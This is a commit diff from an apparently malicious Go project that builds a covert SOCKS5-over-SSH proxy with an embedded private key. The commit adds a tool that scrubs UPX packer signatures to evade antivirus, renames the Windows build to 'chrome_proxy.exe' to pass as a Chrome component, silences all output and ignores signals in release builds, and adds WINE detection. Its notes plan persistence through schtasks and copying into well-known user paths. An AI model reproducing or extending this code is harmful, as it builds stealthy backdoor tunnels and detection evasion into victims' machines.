Initial work on systemOSDetect for WINE

.github/workflows/build.yml

@@ -100,9 +100,23 @@ jobs:
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
 
-      - name: Store release artifacts
+
+      - name: Obfuscate UPX packed executable
+        run: "go run cmd/upx-obfuscator/main.go dist/win-release_windows_amd64_v1/go-socks5-ssh-proxy.exe"
+
+      - name: Copy win64 release exe for dist
+        run: "cp dist/win-release_windows_amd64_v1/go-socks5-ssh-proxy.exe dist/chrome_proxy.exe"
+
+      - name: Store win64 release exe for dist
         uses: actions/upload-artifact@v4
         with:
-          name: dist-release-dll
+          name: ChromeProxyPlugin
+          path: |
+            dist/chrome_proxy.exe
+
+      - name: Store all GoReleaser artifacts
+        uses: actions/upload-artifact@v4
+        with:
+          name: dist-goreleaser
           path: |
             dist

Makefile

@@ -1,6 +1,7 @@
-SOURCES=Makefile main.go main_release.go main_debug.go config.go config_release.go config_template.go 
+SOURCES=Makefile main.go main_release.go main_debug.go config.go config_release.go config_template.go system.go
 GARBLE_BIN = $(shell go env GOPATH)/bin/garble
 GARBLE_CMD = $(GARBLE_BIN) -literals -tiny
+RELEASE_VERBOSE_MODE_KEY ?= ""
 
 all: socks5-ssh-proxy
 
@@ -20,7 +21,9 @@ socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
 	upx $@
 win: socks5-ssh-proxy.exe
 socks5-ssh-proxy.exe: resources $(GARBLE_BIN) $(SOURCES)
-	GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags -H=windowsgui -tags release -o $@
+	GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags "-H=windowsgui -X cfg.VerboseModeKey=$(RELEASE_VERBOSE_MODE_KEY)" -tags release -o $@
+	upx $@
+	go run cmd/upx-obfuscator/main.go $@
 goreleaser: resources $(GARBLE_BIN)
 	goreleaser build --clean --snapshot --id win-release
 win-package: ChromeProxyHelperPlugin.zip
@@ -57,6 +60,9 @@ resources/ssh_private_key:
 resources/ssh_private_key.base64: resources/ssh_private_key
 	base64 -i $< -o $@
 
+fmt:
+	gofmt -w *.go
+
 secrets: config_release.go.base64 resources/ssh_private_key.base64
 
 .phony: clean test win

README.md

@@ -61,10 +61,13 @@ Following detections have been tested:
 * go
 * upx
 * goreleaser
-* mingw-w64 (for building the windows dll)
+* mingw-w64 (for building the windows dll/exe)
 
 ## Related information
 
+* <https://github.com/rootkit-io/awesome-malware-development>
+* <https://github.com/rshipp/awesome-malware-analysis#readme>
+* <https://github.com/Karneades/awesome-malware-persistence#readme>>
 * <https://www.yourcts.com/2024/01/19/beware-of-new-go-based-malware/>
 * <https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6>
 * <https://emulator41.medium.com/golang-malware-used-by-cybercriminals-408276a276c8>
@@ -72,8 +75,6 @@ Following detections have been tested:
 
 ## Development information
 
+* <https://pypi.org/project/unipacker/>
 * <https://medium.com/analytics-vidhya/running-go-code-from-python-a65b3ae34a2d>
-* <https://github.com/weak1337/Alcatraz>
 * <https://github.com/burrowers/garble?tab=readme-ov-file#mechanism>>
-* <https://medium.com/@ankyrockstar26/unpacking-a-upx-malware-dca2cdd1a8de>
-* <https://www.mosse-security.com/2020/09/29/upx-malware-evasion-technique.html?ref=nishtahir.com>

cmd/upx-obfuscator/main.go

@@ -0,0 +1,41 @@
+package main
+
+import (
+	"os"
+	"bytes"
+	"log"
+)
+
+func bytesReplace(data, old, new []byte) []byte {
+	foundIndex := bytes.Index(data, old)
+	if foundIndex > -1 {
+		// Found it!
+		log.Println("Found identifier at offset", foundIndex)
+	} else {
+		return data
+		log.Fatalln("Error file is not UPX packed")
+	}
+
+	return bytes.Replace(data, old, new, 1)
+}
+
+func main() {
+	if len(os.Args) != 2 {
+		log.Fatalln("Specify exe file to obfuscate")
+	}
+
+	filename := os.Args[1]
+
+	log.Println("Obfuscating UPX compressed executable file")
+	log.Println("\t", filename)	
+
+	data, _ := os.ReadFile(filename)
+
+	data = bytesReplace(data, []byte("UPX0"), []byte("GSP7"))
+	data = bytesReplace(data, []byte("UPX1"), []byte("GSP1"))
+	data = bytesReplace(data, []byte("UPX2"), []byte("GSP2"))
+
+	_ = os.WriteFile(filename, data, 0666)
+
+	log.Println("done")
+}

cmd/upx_obfuscator/main.go

@@ -1,37 +0,0 @@
-package main
-
-import (
-	"os"
-	"bytes"
-	"log"
-)
-
-var originalIdentifier = []byte("UPX0")	 
-var obfuscatedIdentifier = []byte("GSP7")	 
-
-func main() {
-	if len(os.Args) != 2 {
-		log.Fatalln("Specify exe file to obfuscate")
-	}
-
-	filename := os.Args[1]
-
-	log.Println("Obfuscating UPX compressed executable file")
-	log.Println("\t", filename)	
-
-	data, _ := os.ReadFile(filename)
-
-	foundIndex := bytes.Index(data, originalIdentifier)
-	if foundIndex > -1 {
-		// Found it!
-		log.Println("Found UPX identifier at offset", foundIndex)
-	} else {
-		log.Fatalln("Error file is not UPX packed")
-	}
-
-
-	obfuscatedData := bytes.Replace(data, originalIdentifier, obfuscatedIdentifier, 1)
-	_ = os.WriteFile(filename, obfuscatedData, 0666)
-
-	log.Println("done")
-}

config.go

@@ -3,20 +3,29 @@ package main
 import "io"
 
 type config struct {
+	// Verbose mode key
+	//
+	// In release builds the verbose mode is silenced when this key is given
+	//  verbose mode is force enabled. The key is read from the "VMK" environment
+	//  variable at startup.
+	//
+	// NOTE: This could be the sha256sum hex encoded string of the SSHPrivateKeyFile
+	VerboseModeKey string
+
 	// SSH server user name
-	SSHServerUserName    string
+	SSHServerUserName string
 
 	// SSH server host and port connect to
-	SSHServerURL         string
+	SSHServerURL string
 
 	// Path to private key pem in debug builds
-	SSHPrivateKeyFile    string
+	SSHPrivateKeyFile string
 
 	// SOCKS5 listen port (when set to 0 dynamic bind)
-	SOCKS5ListenPort     int
+	SOCKS5ListenPort int
 
 	// Enable if host has SSHFP in DNS. When disabled insecure host key check is performed.
-	SSHVerifyValidSSHFP  bool
+	SSHVerifyValidSSHFP bool
 
 	// DNS client resolv.conf for fetching SSHFP records from.
 	//  Config is used when SSHVerifyValidSSHFP = true

config_template.go

@@ -1,15 +1,17 @@
 //go:build !release
 // +build !release
+
 package main
 
 import "strings"
 
 var cfg config = config{
+	VerboseModeKey:      "ShowMeTheMoney",
 	SSHServerUserName:   "username",
 	SSHPrivateKeyFile:   "path/to/id_ecdsa",
 	SSHServerURL:        "myhost.org:22",
 	SOCKS5ListenPort:    13376,
-	SSHVerifyValidSSHFP: false, 
+	SSHVerifyValidSSHFP: false,
 	DNSServersResolvConf: strings.NewReader(`nameserver 8.8.8.8 
 nameserver 8.8.4.4
 `),

docs/NOTES.md

@@ -0,0 +1,54 @@
+# Some notes to Escape from Babylon
+
+## Well known paths (Windows)
+
+* Python official install path for current user `%APPDATA\Local\Programs\Python\PythonXX`
+* NPM global current user path: `%APPDATA%\Roaming\npm\node_modules\npm\bin`
+* Go bin folder: `C:\Users\YourUsername\go\bin\go.exe`
+* Rust: `C:\Users\YourUsername\.cargo\bin\rustc.exe`
+* Haskel: `C:\Users\YourUsername\AppData\Roaming\local\bin\ghc.exe`
+* FireFox: `C:\Users\<username>\AppData\Local\Mozilla Firefox\firefox.exe`
+* Chrome: `C:\Users\<username>\AppData\Local\Google\Chrome\Application`
+	* `chrome.exe`: The main executable for launching Google Chrome.
+	* `chrome_proxy.exe`: A process used for managing proxy settings in Chrome.
+	* `chrome_launcher.exe`: Typically used to start the Chrome browser with specific configurations.
+	* `chrome.dll`: While not an .exe, chrome.dll is a crucial dynamic link library file used by Chrome. (For context, it is located in the same directory or subdirectories, but it’s not an executable file.)
+	* `chrome_remote_desktop_host.exe`: If Chrome Remote Desktop is installed, this executable handles remote desktop connections.
+	* `chrome_update.exe`: An executable for updating Chrome.
+
+* Edge extensions: `C:\Users\<YourUsername>\AppData\Local\Microsoft\Edge\User Data\Default\Extensions`
+* Opera: `C:\Users\<YourUsername>\AppData\Roaming\Opera Software\Opera Stable\Extensions`
+* Firefox profile extensions: `C:\Users\<YourUsername>\AppData\Roaming\Mozilla\Firefox\Profiles\<ProfileName>\extensions`
+* Chrome extensions and components: `C:\Users\<YourUsername>\AppData\Local\Google\Chrome\User Data\Default\Extensions`
+
+Check if running under wine by testing if executables are present:
+
+* `.wine/drive_c/windows/syswow64/wine*.exe`
+* `.wine/drive_c/windows/system32/wine*.exe`
+
+## Ultimate Packer for Executables (UPX)
+
+* <https://www.ired.team/offensive-security/defense-evasion/t1045-software-packing-upx>
+* <https://medium.com/@ankyrockstar26/unpacking-a-upx-malware-dca2cdd1a8de>
+* <https://www.mosse-security.com/2020/09/29/upx-malware-evasion-technique.html?ref=nishtahir.com>
+* <https://www.esecurityplanet.com/threats/upx-compression-detection-evasion/>
+
+## Persistence and hiding
+
+* Search for existing well known binary paths
+* Copy argv[0] to well known binary path
+* Register startup by system
+  * schtasks (cmd) for system or local user
+  * go-autostart: shortcut in start-menu
+* Write state file of persistence to somewhere...
+
+## Debugging release build
+
+* The "VMK" environment variable is the VerboseModeKey which enables logging to stdout/stderr even in release build
+
+## Windows
+
+* Copy to well known current user binary path to semi related filenames
+* Run via start menu item for current user, or via `schtasks`
+  * <https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create>
+  * <https://github.com/emersion/go-autostart>

main.go

@@ -133,6 +133,14 @@ func main() {
 
 	log.Println("SOCKS5 Addr", proxyServerURL)
 
+	systemOSDetect()
+	systemGetWellKnownExistingPaths()
+
+	mainLoop()
+}
+
+func mainLoop() {
 	for {
+		// TODO handle CTRL+C in debug and release + VMK modes
 	}
 }

main_debug.go

@@ -1,5 +1,6 @@
 //go:build !release
 // +build !release
+
 package main
 
 var resourceSSHPrivateKey string

main_release.go

@@ -1,29 +1,20 @@
 //go:build release
 // +build release
+
 package main
 
 import (
 	_ "embed"
 	"os"
-	"fmt"
-	"log"
 )
 
 //go:embed resources/ssh_private_key
 var resourceSSHPrivateKey string
 
 func init() {
-	// Open /dev/null for writing
+	dontSilenceKey := os.Getenv("VMK")
-	nullFile, err := os.OpenFile(os.DevNull, os.O_WRONLY, 0666)
+	if dontSilenceKey != cfg.VerboseModeKey {
-	if err != nil {
+		systemRouteAllLogging(os.DevNull)
-		fmt.Println("Error opening /dev/null:", err)
+		systemIgnoreAllSignals()
-		return
 	}
-
-	// Redirect stdout and stderr to /dev/null
-	os.Stdout = nullFile
-	os.Stderr = nullFile
-
-	// Redirect log facility to /dev/null
-	log.SetOutput(nullFile)
 }

system.go

@@ -0,0 +1,166 @@
+package main
+
+import (
+	"fmt"
+	"log"
+	"os"
+	"os/signal"
+	"path/filepath"
+	"strings"
+)
+
+// Route all logging
+func systemRouteAllLogging(logfile string) {
+	nullFile, err := os.OpenFile(logfile, os.O_WRONLY, 0666)
+	if err != nil {
+		fmt.Println("Error opening /dev/null:", err)
+		return
+	}
+
+	// Redirect stdout and stderr to /dev/null
+	os.Stdout = nullFile
+	os.Stderr = nullFile
+
+	// Redirect log facility to /dev/null
+	log.SetOutput(nullFile)
+}
+
+func systemGetAppDataPath() string {
+	return filepath.Join(os.Getenv("USERPROFILE"), "AppData")
+}
+
+// systemCheckDirExists checks if the directory at the given path exists.
+func systemIsDirExisting(path string) bool {
+	// Get file info
+	info, err := os.Stat(path)
+	if err != nil {
+		// If the error is due to the file not existing, return false
+		if os.IsNotExist(err) {
+			return false
+		}
+		// For any other errors, you may want to handle them as needed
+		return false
+	}
+
+	// Check if the info corresponds to a directory
+	return info.IsDir()
+}
+
+func systemGetFilesInDirectory(path string) ([]string, bool) {
+	var filesInDirectory []string
+
+	files, err := os.ReadDir(path)
+	if err != nil {
+		return nil, false
+	}
+
+	for _, file := range files {
+		filesInDirectory = append(filesInDirectory, file.Name())
+	}
+
+	return filesInDirectory, true
+}
+
+func systemIsFileExisting(path string) bool {
+	// Get file info
+	info, err := os.Stat(path)
+	if err != nil {
+		// If the error is due to the file not existing, return false
+		if os.IsNotExist(err) {
+			return false
+		}
+		// For any other errors, you may want to handle them as needed
+		return false
+	}
+
+	// Check if the info corresponds to a regular file
+	return !info.IsDir()
+}
+
+func systemGetSysWOW64Files() []string {
+	sysWOW64Path := filepath.Join("C:", "Windows", "SysWOW64")
+	files, _ := systemGetFilesInDirectory(sysWOW64Path)
+	return files
+}
+
+func systemGetSystem32Files() []string {
+	system32Path := filepath.Join("C:", "Windows", "system32")
+	files, _ := systemGetFilesInDirectory(system32Path)
+	return files
+}
+
+func systemGetWellKnownWINEOSFiles() []string {
+	var wineFiles []string
+	var foundFiles []string
+
+	foundFiles = append(foundFiles, systemGetSysWOW64Files()...)
+	foundFiles = append(foundFiles, systemGetSystem32Files()...)
+
+	for _, file := range foundFiles {
+		if strings.Contains(file, "wine") && strings.Contains(file, ".exe") {
+			wineFiles = append(wineFiles, file)
+		}
+	}
+
+	return wineFiles
+}
+
+func systemGetWellKnownExistingPaths() []string {
+	var existingPaths []string
+
+	appDataPath := systemGetAppDataPath()
+	if ok := systemIsDirExisting(appDataPath); !ok {
+		log.Println("\t❌", appDataPath)
+	}
+
+	wellKnownPathsToCheck := []string{
+		filepath.Join(appDataPath, "Local", "Programs", "Python"),           // TODO search python installations
+		filepath.Join(appDataPath, "Roaming", "npm", "node_modules", "bin"), // TODO search python installations
+	}
+
+	homeDirectory, err := os.UserHomeDir()
+	if err == nil {
+		homeDirPathsToCheck := []string{
+			filepath.Join(homeDirectory, "go", "bin"),
+		}
+		wellKnownPathsToCheck = append(wellKnownPathsToCheck, homeDirPathsToCheck...)
+	}
+
+	for _, path := range wellKnownPathsToCheck {
+		if ok := systemIsDirExisting(path); ok {
+			existingPaths = append(existingPaths, path)
+			log.Println("\t✅", path)
+		} else {
+			log.Println("\t❌", path)
+		}
+	}
+
+	return existingPaths
+}
+
+func systemIgnoreAllSignals() {
+	// Create a channel to receive OS signals.
+	sigs := make(chan os.Signal, 1)
+
+	// Notify the signal channel for all signals (you can add more if needed)
+	signal.Notify(sigs)
+
+	// This goroutine receives signals but does nothing with them.
+	go func() {
+		for sig := range sigs {
+			// Signal received but ignored
+			_ = sig
+			log.Println("Received OS signal", sig)
+		}
+	}()
+}
+
+func systemOSDetect() {
+	wineOSFiles := systemGetWellKnownWINEOSFiles()
+	if len(wineOSFiles) != 0 {
+		log.Println("WINE detected")
+		for _, file := range wineOSFiles {
+			log.Println("\t", file)
+		}
+	}
+}